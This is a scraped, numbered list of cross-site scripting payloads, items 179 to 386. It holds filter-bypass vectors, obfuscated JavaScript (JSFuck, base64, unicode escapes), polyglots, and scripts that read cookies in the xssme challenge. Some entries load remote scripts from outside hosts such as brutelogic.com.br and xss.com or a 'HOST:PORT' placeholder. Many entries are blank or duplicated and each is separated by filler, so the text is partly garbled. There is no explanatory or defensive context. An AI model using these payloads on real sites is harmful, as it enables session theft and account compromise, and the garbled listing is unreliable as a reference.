    DSAD

  179. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  180. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  181. image <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  182. image <textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

    DSAD

  183. image <object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">

    DSAD

  184. image <script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  185. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  186. image <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>

    DSAD

  187. image <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

    DSAD

  188. image <a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>

    DSAD

  189. image <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  190. image <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  191. image Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>

    DSAD

  192. image <a href="javascript:\u0061l&#101rt(1)"><button>

    DSAD

  193. image <div onmouseover='alert(1)'>DIV</div>

    DSAD

  194. image <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

    DSAD

  195. image <a href="jAvAsCrIpT:alert(1)">X</a>

    DSAD

  196. image <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

    DSAD

  197. image <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

    DSAD

  198. image <var onmouseover="prompt(1)">On Mouse Over</var>?

    DSAD

  199. image <a href=javascript:alert(document.cookie)>Click Here</a>

    DSAD

  200. image <img src="/" =_=" title="onerror='prompt(1)'">

    DSAD

  201. image <%<!--'%><script>alert(1);</script -->

    DSAD

  202. image <script src="data:text/javascript,alert(1)"></script>

    DSAD

  203. image <input type="text" value=``<div/onmouseover='alert(1)'>X</div>

    DSAD

  204. image <input value=<><iframe/src=javascript:confirm(1)

    DSAD

  205. image <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?

    DSAD

  206. image <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>

    DSAD

  207. image <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

    DSAD

  208. image <meta http-equiv="refresh" content="0;javascript:alert(1)"/>?

    DSAD

  209. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  210. image <svg contentScriptType=text/vbs><script>MsgBox+1

    DSAD

  211. image <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

    DSAD

  212. image <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

    DSAD

  213. image <a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a

    DSAD

  214. image <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

    DSAD

  215. image <script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/

    DSAD

  216. image <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????

    DSAD

  217. image <object data=javascript:\u0061l&#101rt(1)>

    DSAD

  218. DSAD

  219. image <script itworksinallbrowsers>/*<script* */alert(1)</script ?

    DSAD

  220. image <svg><script>//
confirm(1);</script </svg>

    DSAD

  221. image <svg><script onlypossibleinopera:-)> alert(1)

    DSAD

  222. image <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

    DSAD

  223. image <div/onmouseover='alert(1)'> style="x:">

    DSAD

  224. image <--`<img/src=` onerror=alert(1)> --!>

    DSAD

  225. image <body/onload=<!-->&#10alert(1)>

    DSAD

  226. image <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?

    DSAD

  227. image <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

    DSAD

  228. image "><img src=x onerror=window.open('https://www.google.com/');>

    DSAD

  229. image <form><button formaction=javascript:alert(1)>CLICKME

    DSAD

  230. image <math><a xlink:href="//jsfiddle.net/t846h/">click

    DSAD

  231. image <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

    DSAD

  232. image <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

    DSAD

  233. DSAD

  234. image <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

    DSAD

  235. image innerHTML=location.hash>#<script>alert(1)</script>

    DSAD

  236. DSAD

  237. DSAD

  238. DSAD

  239. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  240. DSAD

  241. image */alert(1)">'onload="/*<svg/1='

    DSAD

  242. DSAD

  243. DSAD

  244. image <math><brute href=javascript:alert(1)>click

    DSAD

  245. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  246. image <isindex action=javascript:alert(1) type=submit value=click>

    DSAD

  247. image <form><button formaction=javascript:alert(1)>click

    DSAD

  248. image <form><input formaction=javascript:alert(1) type=submit value=click>

    DSAD

  249. image <form><input formaction=javascript:alert(1) type=image value=click>

    DSAD

  250. image <form><input formaction=javascript:alert(1) type=image src=SOURCE>

    DSAD

  251. image <isindex formaction=javascript:alert(1) type=submit value=click>

    DSAD

  252. image <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

    DSAD

  253. image <svg><script xlink:href=data:,alert(1) />

    DSAD

  254. image <math><brute xlink:href=javascript:alert(1)>click

    DSAD

  255. image <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

    DSAD

  256. image "><img src=1 onerror=alert(1)>.gif

    DSAD

  257. image <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

    DSAD

  258. image GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

    DSAD

  259. image "><script src=data:,alert(1)//

    DSAD

  260. image <script src="//brutelogic.com.br/1.js#

    DSAD

  261. image "><script src=//brutelogic.com.br/1.js#

    DSAD

  262. image <link rel=import href="data:text/html,<script>alert(1)</script>

    DSAD

  263. image "><link rel=import href=data:text/html,<script>alert(1)</script>

    DSAD

  264. image <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

    DSAD

  265. image <body onhashchange=alert(1)><a href=#x>click this!#x

    DSAD

  266. image <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

    DSAD

  267. image <body onscroll=alert(1)><br><br><br><br>

    DSAD

  268. image <video onloadstart=alert(1)><source>

    DSAD

  269. image <form onsubmit=alert(1)><input type=submit>

    DSAD

  270. image <select onchange=alert(1)><option>1<option>2

    DSAD

  271. DSAD

  272. image <scr<script>ipt>alert('XSS')</scr<script>ipt>

    DSAD

  273. image "><script>alert('XSS')</script>

    DSAD

  274. image "><script>alert(String.fromCharCode(88,83,83))</script>

    DSAD

  275. image <img src=x onerror=alert(String.fromCharCode(88,83,83));>

    DSAD

  276. image <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

    DSAD

  277. image "><img src=x onerror=alert('XSS');>

    DSAD

  278. image "><img src=x onerror=alert(String.fromCharCode(88,83,83));>

    DSAD

  279. image "><svg/onload=alert(String.fromCharCode(88,83,83))>

    DSAD

  280. image <video><source onerror="javascript:alert(1)">

    DSAD

  281. image <video src=_ onloadstart="alert(1)">

    DSAD

  282. image <details/open/ontoggle="alert`1`">

    DSAD

  283. image <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

    DSAD

  284. image <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

    DSAD

  285. image data:text/html,<script>alert(0)</script>

    DSAD

  286. image jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

    DSAD

  287. image ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http: //i.imgur.com/P8mL8.jpg">

    DSAD

  288. image " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

    DSAD

  289. image ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

    DSAD

  290. image javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

    DSAD

  291. image javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

    DSAD

  292. image javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

    DSAD

  293. image javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

    DSAD

  294. image javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

    DSAD

  295. image javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

    DSAD

  296. image javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

    DSAD

  297. image --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

    DSAD

  298. image /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

    DSAD

  299. image javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

    DSAD

  300. image /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

    DSAD

  301. image <script>window['alert'](document['domain'])<script>

    DSAD

  302. image <script>window['alert'](0)</script>

    DSAD

  303. image <script>parent['alert'](1)</script>

    DSAD

  304. DSAD

  305. DSAD

  306. DSAD

  307. DSAD

  308. DSAD

  309. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  310. DSAD

  311. image */alert(1)">'onload="/*<svg/1='

    DSAD

  312. DSAD

  313. DSAD

  314. image <math><brute href=javascript:alert(1)>click

    DSAD

  315. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  316. image <isindex action=javascript:alert(1) type=submit value=click>

    DSAD

  317. image <form><button formaction=javascript:alert(1)>click

    DSAD

  318. image <form><input formaction=javascript:alert(1) type=submit value=click>

    DSAD

  319. image <form><input formaction=javascript:alert(1) type=image value=click>

    DSAD

  320. image <form><input formaction=javascript:alert(1) type=image src=SOURCE>

    DSAD

  321. image <isindex formaction=javascript:alert(1) type=submit value=click>

    DSAD

  322. image <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

    DSAD

  323. image <svg><script xlink:href=data:,alert(1) />

    DSAD

  324. image <math><brute xlink:href=javascript:alert(1)>click

    DSAD

  325. image <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

    DSAD

  326. image "><img src=1 onerror=alert(1)>.gif

    DSAD

  327. image <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

    DSAD

  328. image GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

    DSAD

  329. image "><script src=data:,alert(1)//

    DSAD

  330. image <script src="//brutelogic.com.br/1.js#

    DSAD

  331. image "><script src=//brutelogic.com.br/1.js#

    DSAD

  332. image <link rel=import href="data:text/html,<script>alert(1)</script>

    DSAD

  333. image "><link rel=import href=data:text/html,<script>alert(1)</script>

    DSAD

  334. image <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

    DSAD

  335. image <body onhashchange=alert(1)><a href=#x>click this!#x

    DSAD

  336. image <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

    DSAD

  337. image <body onscroll=alert(1)><br><br><br><br>

    DSAD

  338. image <video onloadstart=alert(1)><source>

    DSAD

  339. image <form onsubmit=alert(1)><input type=submit>

    DSAD

  340. image <select onchange=alert(1)><option>1<option>2

    DSAD

  341. DSAD

  342. image <script>\u0061\u006C\u0065\u0072\u0074(1)</script>

    DSAD

  343. image <img src="1" onerror="alert(1)" />

    DSAD

  344. image <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

    DSAD

  345. image <iframe src="javascript:alert(1)"></iframe>

    DSAD

  346. image <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

    DSAD

  347. DSAD

  348. image <script ~~~>confirm(1)</script ~~~>

    DSAD

  349. DSAD

  350. image <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>

    DSAD

  351. image <</script/script><script ~~~>\u0061lert(1)</script ~~~>

    DSAD

  352. image </style></scRipt><scRipt>alert(1)</scRipt>

    DSAD

  353. image <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>

    DSAD

  354. image <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

    DSAD

  355. image <svg><x><script>alert('1'&#41</x>

    DSAD

  356. image <iframe src=""/srcdoc='<svg onload=alert(1)>'>

    DSAD

  357. image '"--></style></script><script>shadowlabs(0x000045)</script>

    DSAD

  358. image <<scr\0ipt/src=http://xss.com/xss.js></script

    DSAD

  359. image '"--></style></script><script>RWAR(0x00010E)</script>

    DSAD

  360. image "><iframe src="http://google.com"% 3E

    DSAD

  361. image '<script>window.onload=function(){document.forms[0].message.value='1';}</script>

    DSAD

  362. image x”</title><img src=x onerror=alert(1)>

    DSAD

  363. image <script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>

    DSAD

  364. image <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

    DSAD

  365. image <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>

    DSAD

  366. image <script>(function() {var event = document.createEvent("MouseEvents");event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>

    DSAD

  367. image <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  368. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  369. image <script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>

    DSAD

  370. image <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>

    DSAD

  371. image <script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>

    DSAD

  372. image <script> var xdr = new ActiveXObject("Microsoft.XMLHTTP"); xdr.open("get", "/xssme2?a=1", true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*?)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>

    DSAD

  373. image <iframe id="ifra" src="/"></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write("<scr" + "ipt>top.foo = Object.defineProperty</scr" + "ipt>"); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>

    DSAD

  374. image <script>alert(document.head.innerHTML.substr(146,20));</script>

    DSAD

  375. image <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>

    DSAD

  376. image <script>alert(document.head.childNodes[3].text)</script>

    DSAD

  377. image <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

    DSAD

  378. image <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")};document.body.appendChild(x);</script>

    DSAD

  379. image <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>")};document.body.appendChild(x);</script>

    DSAD

  380. image <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' + x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>

    DSAD

  381. image <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>

    DSAD

  382. image <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click(test); </script>

    DSAD

  383. image <script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>

    DSAD

  384. image <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%3Dnew%20this.contentWindow.window.XMLHttpRequest%28%29%3Bfff.open%28%22GET%22%2C%22xssme2%22%29%3Bfff.onreadystatechange%3Dfunction%28%29%7Bif%20%28fff.readyState%3D%3D4%20%26%26%20fff.status%3D%3D200%29%7Balert%28fff.responseText%29%3B%7D%7D%3Bfff.send%28%29%3B></iframe>

    DSAD

  385. image <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>

    DSAD

  386. image <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

    DSAD

